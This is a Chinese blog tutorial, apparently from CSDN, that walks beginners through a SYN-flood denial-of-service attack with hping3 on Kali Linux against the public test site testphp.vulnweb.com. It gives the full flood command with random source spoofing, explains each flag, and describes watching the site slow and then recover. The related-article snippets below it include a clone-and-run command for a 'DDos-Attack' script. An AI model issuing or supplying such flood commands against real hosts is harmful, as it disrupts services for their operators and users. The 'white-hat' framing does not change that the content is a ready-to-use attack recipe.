白帽子黑客教你:如何使用Kali Linux渗透系统进行DDOS攻激和信息收集实战?

最新推荐文章于 2024-04-29 10:49:28 发布
最新推荐文章于 2024-04-29 10:49:28 发布
阅读量1.9k 收藏 22
点赞数 3
分类专栏: 科技 黑客 IT技术 文章标签: linux ubuntu centos 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/108298665
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

一、背景介绍
Hping是一个命令行下使用的TCP/IP数据包组装/分析工具,其命令模式很像Unix下的ping命令,但是它不是只能发送ICMP回应请求,它还可以支持TCP、UDP、ICMP和RAW-IP协议,它有一个路由跟踪模式,能够在两个相互包含的通道之间传送文件。Hping常被用于检测网络和主机,其功能非常强大,可在多种操作系统下运行,如Linux,FreeBSD,NetBSD,OpenBSD,Solaris,MacOs X,Windows。

二、资源装备

  1. 安装好Kali Linux的虚拟机一台;
  2. 整装待发的小白一个。

三、战略安排
3.1 寻找测试网站,如下图所示。
网站:http://testphp.vulnweb.com/login.php
在这里插入图片描述

3.2 认识hping3小工具,如下图所示。
命令:hping3
在这里插入图片描述

3.3 掌握hping3的使用方法,如下图所示。
命令:hping3 --help
在这里插入图片描述

3.4 利用hping3小工具进行DDos攻击,如下图所示。
命令:hping3 -c 1200 -d 130 -S -w 64 -p 80 --flood --rand-source testphp.vulnweb.com
-c(count) 表示要发送的数据包的数量
-d(data size) 发送数据包的大小
-S(SYN)SYN数据包
-w 表示TCP的窗口大小
-p 端口
–flood 洪水攻击模式
–rand-source 表示设定随机的源地址
testphp.vulnweb.com 需要攻击的网站域名
在这里插入图片描述

3.5 测试进行中。。。。。。。。如下图所示。
在这里插入图片描述

3.6 如下图所示,刷新被测试的网站,查看测试效果。
在这里插入图片描述
在这里插入图片描述

3.7 停止测试,查看效果,如下图所示。
命令:Ctrl+c
在这里插入图片描述

3.8 停止测试后重新加载测试网页,查看效果,如下图所示。
在这里插入图片描述

3.9 停止测试后网页恢复,如下图所示。
在这里插入图片描述

PS:到此学习完毕,谢谢观看,获取更多干货请持续关注本号!

点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
[INFOCOM 2016] DDoS Attack Detection under SDN Context
新熊君的博客
05-08 569
论文 Xu Y , Liu Y . DDoS attack detection under SDN context[C]// IEEE INFOCOM 2016 - IEEE Conference on Computer Communications. IEEE, 2016. 0 Abstract 软件定义网络(Software Defined Networking, SDN)已经成为了一种...
KaliLinux安全渗透程(完整版)
04-26
第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上...
Kali linux渗透测试系列————23、Kali linux 渗透攻击服务器攻击
Fly_鹏程万里
05-16 1万+
漏洞评估服务器攻击即找出并利用服务器上的服务、端口和应用程序中的漏洞。举个例子,Web服务器都有多个攻击途径(Attack Vector)。它会运行一个操作系统,并运行各种各样的软件来提供Web功能。它会有很多打开的TCP端口。这些途径中的每一个都有可能找出一个攻击者能利用的漏洞,攻击者可以借此潜入系统并获取有用的信息。服务器上的许多协议都是人类可读的为加密文本处理的。在Kali中也带了较多用来...
使用hping3进行Dos攻击实验(安装+攻击保姆级程)
m0_74806866的博客
12-02 4945
对hping3的安装和使用进行了一个简单的介绍,和一个简单的攻击实验
Kali Linux三种网络攻击方法总结(DDoS、CC和ARP欺骗)
最新发布
韩束一叶子
04-29 1482
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频程,上面路线图的每一个知识点,我都有配套的视频讲解。现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,
Kali linux使用DDOS***小脚本
weixin_34290390的博客
08-12 917
1.slowhttptest安装方法:wget http://slowhttptest.googlecode.com/files/slowhttptest-1.5.tar.gz && tar -vxf slowhttptest-1.5.tar.gz && cd slowhttptest-1.5/ && ./configure &...
DDoS Attacks
chengfangang的专栏
01-21 2535
Distributed Denial of Service Attack (DDoS) Definition DDoS stands for “Distributed Denial of Service.” A DDoS attack is a malicious attempt to make a server or a network resource unavailable to user
如何用kali Linux进行DNS欺骗、窃取cookies,使用SSLstrip
huxdl的博客
12-24 1万+
由于入侵检测这门课要做PPT讲解,所以我研究了一下Kali linux上的一些实验,首先介绍一下kali linux: 按照官方网站的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。集成超过300个渗透测试工具。(
网络安全工程师与白帽子黑客Kali Linux渗透:内网攻防实战技巧
Kali与编程
09-19 822
课前声明: 本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 本节课你将了解到如何使用ARP欺骗窃取局域网用户相关账户密码,内容包括: 如何开启IP转发 怎样窃取受害用户相关账号密码 一、如何开启IP转发 在之前的截取受害者电脑图片流量的课程中,我们也讲过了要开启IP转发以及如何开启,开启IP转发使受害者电脑能够正常联网,不至于打草惊蛇,方便我们后续的攻击,这里我们在重述一下如何开启IP转发。 在kali机终端中输入c
Kali Linux系统使用基础程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
基于树莓派Kali Linux渗透测试基础程,网络安全,计算机,黑客
03-13
树莓派kali linux程 树莓派,(英语:Raspberry Pi,简写为RPi,别名为RasPi / RPI) [1] 是为学习计算机编程育而设计,只有信用卡大小的微型电脑,其系统基于Linux。随着Windows 10 IoT的发布,用户可以用上...
kali:树莓派上安装kali Linux系统打造便携式渗透组合
03-28
在本程中,我们将深入探讨如何在树莓派上安装Kali Linux系统,以及如何进行初始配置,将这个小巧的设备打造成一个强大的便携式渗透测试工具。Kali Linux是一款基于Debian的开源操作系统,专为网络安全专业人士设计...
什么是 DDos 攻击
热门推荐
布袋和尚
02-17 3万+
一、简介 1、中文名称:分布式拒绝服务,英文全称:distributed denial-of-service 。 2、具体含义 通过大规模互联网流量淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或网络正常流量的恶意行为。 更加形象的比喻: 如果把互联网上的网站或服务器看作一个个商店(比如淘宝、京东、微信等等),每个访问网站的网民看作是商店里的顾客。DDoS 就相当于一堆小混混装成正常顾客涌入商店,逛来逛去赖着不走让正常的顾客进不来,或者跟售卖员有一搭没一搭地说话,占用他们的时间,让他们无法
压力测试工具之DDos-Attack
石宗昊的博客
04-03 2287
git clone https://github.com/Ha3MrX/DDos-Attack cd DDos-Attack chmod +x ddos-attack.py python ddos-attack.py
DDos攻击概述
weixin_46516647的博客
05-15 667
通过淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或的恶意行为目标服务器类比作商店;网络的正常流量类比作顾客;此恶意行为便相当于让一堆小混混装成正常顾客涌入商店,逛来逛去赖着不走让正常的顾客进不来,或者跟售卖员有一搭没一搭地说话,占用他们的时间,让他们无法正常服务客户。
【网安】DDoS攻击:方法、影响与防御策略
定期分享我的发现和想法,感谢你的陪伴和支持
03-23 6709
在数字化时代,网络安全已成为每个在线实体的首要关注点。DDoS攻击,或分布式拒绝服务(Distributed Denial of Service)攻击,是一种常见而又复杂的网络攻击方式,它利用被控制的网络设备向目标发送海量请求,导致服务不可用。本文将探讨DDoS攻击的实施方法、影响以及防御措施。
DDos-Attack Windows/Linux攻击方法-简介
m0_73135216的博客
06-19 1092
ddos-attack攻击
kali渗透之综合实战拿下root全过程
m0_56988395的博客
02-25 8776
目录 靶机 攻击机 开局先扫端口 keystore:密钥的储存库 提权 1、根据版本找一下看有没有漏洞 2、sudo -l 3、history 4、利用weatweb来识别一下http用的什么程序 发现数据库用户名为root,密码为空密码,进到mysql看看 登录一下milton 切换blumbergh用户 最后开个新终端进行监听端口 注:以下内容仅供交流学习,请勿用于非法途径 这次渗透涉及的知识点较多,难度稍微复杂些许 靶机 DC-9(需要主机模式
如何使用KALI攻击“恶意网站“实验
qq_52337463的博客
01-13 2万+
如何使用kali对"恶意网站"进行攻击实验

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值